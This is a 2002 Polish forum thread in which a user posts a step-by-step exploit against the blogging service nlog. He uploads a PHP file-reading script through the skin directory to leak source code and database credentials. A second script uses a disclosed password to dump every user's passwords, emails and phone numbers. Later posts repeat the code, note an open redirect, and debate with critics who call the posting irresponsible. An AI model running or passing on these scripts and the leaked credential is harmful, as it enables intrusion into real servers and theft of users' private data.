| | vincent - 2002.11.03 20:18 - odpowiedz | | | lordzik jakis czas temu wskazal na problem braku bezpieczenstwa na nlogu. Nie mam pojecia, czy warp juz naprawil to, czy nie - mam nadzieje, ze tak.
Ponizszy material jest wiec publikowany w celu edukacyjnym, a ja nie biore odpowiedzialnosci za skutki jego wykorzystania.
!!! UWAGA. Poniewaz podwojny cudzyslow powoduje, ze post nie przechodzi, podwojny cudzyslow zostal zastapiony znakiem ^ - zeby dzialalo, wszystkie ^ nalezy zastapic cudzyslowami.
1. wpisujemy do Notatnika lub innego edytora ponizsze:
$fd = fopen ($plik, ^r^);
$contents = fread ($fd, filesize ($plik));
fclose ($fd);
echo ^^;
?>
i zapisujemy jako na przyklad skrypt.php
2. Ladujemy nasz skrypt.php na serwer poprzez jego wrzucenie do katalogu sluzacego do skinow. Znajdujemy, pod jakim adresem lezy. Wywolujemy go z serwera wpisujac jego adres z parametrem ?plik=index.php (czyli: skrypt.php?plik=index.php )
Ten krok wyswietli nam zrodlo kodu php dla strony index i ujawni aktualne haslo do bazy.
3. Gdy juz mamy haslo, ktore, jak donosi moj tajny informator, ostatnio brzmialo 'buyusfuckyou', robimy drugi plik z rozszerzeniem php o tresci:
$connection = mysql_connect(^localhost^, ^nlog^, ^buyusfuckyou^);
$q = ^select * from nlog_users^;
$res = mysql_query ($q);
echo ^^;
while ( $row = mysql_fetch_row ($res) )
{
echo ^^;
for ($i = 0; $i < count($row); $i++)
{
echo ^^.$row[$i].^ | ^;
}
echo ^ ^;
}
echo ^ ^;
mysql_close ();
?>
... zastepujac ewentualnie 'buyusfuckyou' aktualnym haslem.
Podobnie jak poprzedni, poprzez skiny ladujemy go na serwer i wywolujemy.
Pokaza sie nam wszyscy userzy nloga wraz z ich haslami, adresami e-mail, nr. telefonow (ci co wpisali), iloscia wpisow, lista osob jakie maja w ulubionych, lista zablokowanych adresow i w ogole wszystkimi danymi :). Strona ta moze sie ladowac dlugo.
Powtarzam: to jest podane w celach rozrywkowo-edukacyjnych. Odczekalem dosc czasu po ogloszeniu lordzika, by warp to naprawil. Jesli nie naprawil i powyzszy schemat wciaz dziala i ktos by sie napalil na wyprobowywanie, to pamietajcie o jednym - hackerzy nie niszcza danych. Nie kasujcie innym ich wpisow, nie zmieniajcie hasel, nie wpisujcie sie w ich imieniu. Nie robcie innym nlogowiczom tego, co wam by bylo niemile. Pamietajcie, ze to bylo znane dosc duzemu gronu osob dlugo, a nikomu sie nic z tego powodu nie stalo w jego nloga. :)
|
| | | vincent - 2002.11.03 20:35 - odpowiedz | | | Zle wyswietlilo fragment, wiec powtarzam tresc plikow, przy czym tym razem dla odzyskania postaci oryginalnej:
Ę nalezy zamienic na zwyczajny cudzyslow
¦ należy zamienić na ostry nawias zamkniety lewostronnie, Ó-prawostronnie - takie jak w znacznikach htmlowych.
Sorry, ze sie motam w polskie literki, ale to jedyna rzecz, co do ktorej nie mam podejrzen, ze wyswietli rzecz dziwnie. Drugi plik przepisze, jak ten przejdzie.
¦?php
$fd = fopen ($plik, ĘrĘ);
$contents = fread ($fd, filesize ($plik));
fclose ($fd);
echo ʦtextareaÓ$contents¦/textareaÓĘ;
?Ó |
| | | vincent - 2002.11.03 20:38 - odpowiedz | | | Drugi plik:
¦?php
$connection = mysql_connect(ĘlocalhostĘ, ĘnlogĘ, ĘbuyusfuckyouĘ);
$q = Ęselect * from nlog_usersĘ;
$res = mysql_query ($q);
echo ʦtable width=100% height=100%ÓĘ;
while ( $row = mysql_fetch_row ($res) )
{
echo ʦtrÓĘ;
for ($i = 0; $i < count($row); $i++)
{
echo ʦtdÓĘ.$row[$i].ʦ/tdÓĘ;
}
echo ʦ/trÓĘ;
}
echo ʦ/tableÓĘ;
mysql_close ();
?Ó |
| | | vincent - 2002.11.03 20:39 - odpowiedz | | | PS. Nawiasem mowiac to, co sie zrobilo przy pierwszym wyslaniu posta oznacza, ze ze strony forum mozna zrobi automatycznego redirecta na dowolna strone... |
| | | vincent - 2002.11.03 20:53 - odpowiedz | | | PS2. Hasla do bazy nie ma w pliku index.php, sorry. Jest w innym. Szukajcie, a znajdziecie, choc lepiej nie szukajcie. |
| | | sony - 2002.11.03 21:14 - odpowiedz | | | co¶ chyba nie działa ten sposób, serwer nie chce wykonywać skryptu |
| | | vincent - 2002.11.03 21:22 - odpowiedz | | | Juz teraz zapewne nie dziala, bo warp naprawil dziury. Przynajmniej czesc z nich. Dlatego odczekalem odpowiednio wiele czasu po lordziku, zeby to nie mialo destrukcyjnego wplywu.
Ale przez ponad 6 miesiecy to dzialalo. |
| | | lordzik - 2002.11.03 21:19 - odpowiedz | | | Mysle, że jeste¶ nieodpowiedzialny. Co innego poinformowanie o dziurze w systemie, a co innego udostępnianie gotowego przepisu, jak mozna ja wykorzystac i narozrabiac.
Na szczescie Warp juz naprawil co trzeba. I hope so. |
| | | vincent - 2002.11.03 21:26 - odpowiedz | | | Tez opisywales swoj pomysl z cookies - zreszta kiepski - tez w sposob, od ktorego niewiele brakuje do gotowego przepisu.
A publikacja po to, by znajacy sie na phpie mogli zobaczyc, na czym dziura polegala. Bo sadzilem, ze warp naprawic zdazyl. Liczylem w kazdym razie na to. Nie sprawdzilem, czy to zrobil, bo osobiscie to jestem lamer i mialbym trudnosci z samodzielnym poprawnym wykonaniem zacytowanej procedury. :) |
| | | chafer - 2002.11.03 22:53 - odpowiedz | | | Co innego pomysl, co innego przepis podany krok po kroku.
Wiadomo (dla przykladu), ze Windows jest pelen dziur. Dziur, ktore zna od groma osob i ktore moga wykorzystac do wlasnch, niecnych celow. Czy w tym wypadku, tez sadzisz, ze opublikowanie gotowego przepisu na np. wlamanie do cudzego komputera byloby czyms wlasciwym?
Vincent..poprzednio zarzuciles Lordzikowi "chwalenie sie" odkryciem bledu w systemie. A co ty teraz zrobiles? To juz nie jest nawet nieodpowiedzialnosc tylko niedojrzalosc.
Ps. Osobiscie sadze, ze i tak nikt z tego przepisu nie skorzysta. Ale chodzi o zasady.
|
| | | vincent - 2002.11.04 00:17 - odpowiedz | | | W ¶rodowisku jest taka zasada, że jak się poinformuje o dziurze osobe odpowiedzialn± i da się jej czas na poprawki, to je¶li nie zostan± one dokonane, publikuje się dziurę _razem z kodem_. To jest ogólnie przyjęte postępowanie. Poczytaj bugtraq. |
| | | chynaa - 2002.11.04 05:14 - odpowiedz | | | Do licha ciężkiego, co tu się dzieje. =| |
| | | | keskese - 2002.11.05 02:04 - odpowiedz | | | czyzby ktos probowal pochwalic sie swoimi zdolnosciami????
niespelnieni zakompleksieni????
no... lusss... |
| | | keskese - 2002.11.05 02:06 - odpowiedz | | | w srodowisku... buahahhaha... w srodowisku jest duzo roznego syfu. |
|
|
